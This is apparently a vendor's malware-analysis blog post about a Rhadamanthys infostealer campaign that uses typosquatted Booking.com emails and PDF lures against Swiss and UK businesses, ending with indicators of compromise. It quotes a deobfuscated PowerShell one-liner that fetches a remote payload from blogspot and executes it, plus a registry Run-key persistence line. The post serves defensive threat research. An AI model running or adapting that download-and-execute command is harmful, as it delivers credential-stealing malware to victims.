Rhadamanthys Stealer Spoofs Emails to Attack Switzerland and the United Kingdom

Yesterday, Lydia blogged about the XWorm malware that targeted the hospitality sector. Beyond it, X-Labs also observed concurrent activity: the Rhadamanthys infostealer is targeting hotels, restaurants and other businesses in Switzerland and the United Kingdom. 

The Rhadamanthys stealer spreads malicious attachments via spoofed emails from Booking.com. During our analysis, we noticed this campaign shared similarities with the Agent Tesla activity we saw early in 2024. 

In the Rhadamanthys campaign, hackers leveraged similar infrastructure but used new obfuscation techniques to steal sensitive information from users. Now, I’ll look deeper into the new techniques to better understand how this infostealer works.

Fig. 1 - Rhadamanthys attack chain

Email Analysis:

Fig. 2 - Rhadamanthys email

Emails take the form of suspicious AI- generated messages which contain technical  anomalies—they use generic recipient addresses, “do not reply” keywords and more. The sender domain looks to be typosquat Booking.com domain “@b00king[.]network.” These emails contain a suspicious PDF attachment in the form of fake invoices and alert messages.

Analysis of PDF:

When user clicks on the PDF, they see an alert message: “Reader not Supported! Please Open in browser.”

Fig. 3 - PDF Attachment

When the user clicks OK, they see another error message that prompts the them  to click on the  ‘Reload’ button. Clicking this button executes  embedded JavaScript code that connects to a malicious URL which downloads the next stage JavaScript payload:

Fig. 4 - JavaScript in PDF

Embedded code in the PDF connects to typosquat Booking.com URL that leverages a = free hosting domain  infrastructure at bo0king[.]blob[.]core.windows[.]net/booking/invoice-1829388947.pdf.html.

Obfuscated JavaScript payload:

The downloaded JavaScript obfuscates by using long variable and function names (507 byte names) and with some inbuilt functions like “parseint().”

Fig. 5 - Obfuscated JavaScript code

Upon replacing long variable and function names, we see the next stage obfuscated payload (Fig. 6 below):

Fig. 6 - First level obfuscated JavaScript

Deobfuscation gets us to the actual PowerShell code:

• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm hxxps://11decmain[.]blogspot[.]com/////////////loraaaa[.]pdf);Start-Sleep -Seconds 3;

From here, we can see that malware authors hosted stage payloads on blogspot.com. This domain redirects to another legitimate cloud repository leveraged to host another PowerShell script that automatically downloads:

• hxxps://bitbucket[.]org/!api/2.0/ snippets/nippleskakulcha/xqM7BE/64cd7a0416f33a5e45dbc4b2c7ec5057e0acb21b/files/decfianl[.]txt

This script also contains self-signed obfuscated certificate seen after the JavaScript code (see Fig. 7):

Fig. 7 - Obfuscated signature below Javascript code

Analysis of PowerShell script:

The script contains huge octal encoded shellcode in variables. It targets legitimate processes like RegSvcs.exe, mhsta.exe, wscript.exe and msbuild.exe in the system that it can stop in order to inject the malcode. 

Fig. 8 - PowerShell script

It’s here we observe the octal to text converter function in the code. From here, the script deletes itself from system and creates another random name payload in the system for persistence.

Fig. 9 - Octal to text decode function in PowerShell

Analysis of final legitimate process:

When the targeted process injected the malcode, it then creates a new process instance of svchost.exe it uses for further execution. At this point, it connects to the C2 server via an  unusual port:

185[.]196[.]8[.]68:7257/6d5f5120d519e2005/jl1w2l3p.070xf

Once connected, it:

• Tries to steal the user’s personal information from browsers history
• Tries to gather system information
• Creates a task scheduler that  embeds PowerShell code in the system registry for persistence: 

“Software\Microsoft\Windows\CurrentVersion\Run\Uplatbook-141 = "schtasks /run /tn Uplatbook-141”” 

• Uses an unregistered version of .net reactor obfuscator
• Abuses Chrome and edge.exe explicitly to perform connection with remote host

Conclusion:

This Rhadamanthys stealer attack relies on typo-squatted domains and malicious PDFs to deliver obfuscated payloads and execute PowerShell scripts. It uses free hosting services and cloud repositories to evade detection to install  persistence mechanisms like task scheduling and registry modifications. 

By leveraging legitimate processes, it establishes stealthy communication with its C2 server and attempts to steal browser data along with system information. Sophisticated obfuscation techniques like using long variable names and octal encoding achieve the desired affect—making detection and analysis more complex.

Protection statement: 

Forcepoint customers are protected against this threat at the following stages of attack:

• Stage 2 (Lure) – Malicious PDF attachments associated with these attacks are identified and blocked by email security analytics.
• Stage 3 (Redirect) – Blocked redirectional blogspot URLs and Bitbutcket cloud project URLs by web real time security scan.
• Stage 5 (Dropper File) - The dropper files are added to Forcepoint malicious database and are blocked.
• Stage 6 (Call Home) - Blocked C2 credentials

IOCs

Initial Stage URLs: 

• bo0king[.]blob[.]core.windows[.]net/booking/invoice-1829388947.pdf.html
• hxxps://11decmain[.]blogspot[.]com/////////////loraaaa[.]pdf
• hxxps://bitbucket[.]org/!api/2.0/ snippets/nippleskakulcha/xqM7BE/64cd7a0416f33a5e45dbc4b2c7ec5057e0acb21b/files/decfianl[.]txt

C2s:

• 185[.]196[.]8[.]68
• 185[.]196[.]11[.]18

Spoofed Senders domain:

• b00king[.]biz
• b00king[.]co[.]za
• b00king[.]network